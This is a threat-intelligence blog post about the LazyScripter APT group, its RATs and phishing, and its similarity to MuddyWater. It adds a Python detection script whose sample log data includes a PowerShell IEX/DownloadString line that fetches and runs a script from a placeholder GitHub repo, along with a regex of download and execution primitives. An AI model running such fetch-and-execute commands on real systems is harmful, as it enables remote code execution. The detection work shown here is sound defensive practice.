
LazyScripter APT

Posted: February 26, 2021

LazyScripter APT is a newly identified Advanced Persistent Threat (APT) group whose activity, tools, and targets appear to overlap with those of other APT groups operating from the Middle East. However, there is not enough data to determine whether LazyScripter APT shares members with other groups from the region or whether it really operates from a Middle Eastern country. The group shows a strong interest in airlines and immigration-related organizations in Canada. One of LazyScripter APT's major targets was the International Air Traffic Association (IATA).

The group relies on spear-phishing emails to reach its targets, and its toolset does not appear to be very sophisticated. It frequently uses well-known malware families, many of which are open-source. Some of LazyScripter APT's notable tools are Zebrocy, Octopus, Remcos and LuminosityLink, all of them Remote Access Trojans (RATs) that let their operators perform a wide variety of tasks on compromised systems.

The LazyScripter APT Reminds Researchers of the MuddyWater APT

According to researchers, the LazyScripter APT's modus operandi closely resembles that of the MuddyWater APT, an Iran-based cybercriminal group. Both groups rely on similar tools and frequently abuse PowerShell scripts to perform additional tasks on compromised machines. Last but not least, both MuddyWater and LazyScripter abuse GitHub to host payloads and other data related to their operations.
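As an added, defender-side illustration (not code from the original article or from any named research team): a small Python triage helper that scans PowerShell script block log entries for the pairing described above, a download cradle fetching content from GitHub-hosted URLs. The workstation names, URLs and script text are constructed sample data, not indicators from the page.

```python
import re
from urllib.parse import urlparse

# Constructed sample entries modelled on PowerShell script block logging
# (Event ID 4104). They are illustrative only, not captured from LazyScripter.
SAMPLE_SCRIPT_BLOCKS = [
    {"host": "ws-01", "text": "Get-ChildItem C:\\Users | Measure-Object"},
    {"host": "ws-02", "text": "IEX (New-Object Net.WebClient).DownloadString("
                              "'https://raw.githubusercontent.com/example-org/repo/main/stage.ps1')"},
    {"host": "ws-03", "text": "Invoke-WebRequest -Uri https://github.com/example-org/repo/"
                              "releases/download/v1/tool.exe -OutFile $env:TEMP\\tool.exe"},
    {"host": "ws-04", "text": "Invoke-WebRequest -Uri https://updates.example.internal/patch.msi "
                              "-OutFile patch.msi"},
]

# Common PowerShell download / in-memory execution primitives.
CRADLE_RE = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|"
    r"Start-BitsTransfer|\bIEX\b|Invoke-Expression)",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)

# GitHub hosts that can serve raw files or release artifacts.
GITHUB_HOSTS = {
    "github.com",
    "raw.githubusercontent.com",
    "gist.githubusercontent.com",
    "objects.githubusercontent.com",
}


def github_hosts_in(text):
    """Return the set of GitHub hostnames referenced by URLs in a script block."""
    hosts = set()
    for url in URL_RE.findall(text):
        host = (urlparse(url).hostname or "").lower()
        if host in GITHUB_HOSTS:
            hosts.add(host)
    return hosts


def flag_github_cradles(entries):
    """Flag entries that combine a download cradle with a GitHub-hosted URL."""
    findings = []
    for entry in entries:
        hosts = github_hosts_in(entry["text"])
        if hosts and CRADLE_RE.search(entry["text"]):
            findings.append({"host": entry["host"], "github_hosts": sorted(hosts)})
    return findings
```

Legitimate administration scripts also fetch from GitHub, so treat a hit as a triage lead to be correlated with the parent process and the user's normal activity rather than as a verdict on its own.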

The first LazyScripter APT operations can be traced back to 2018, and the group appears to still be active in 2021. Thankfully, because the criminals use well-known malware families, organizations can likely protect their networks by investing in reliable, up-to-date anti-virus software.
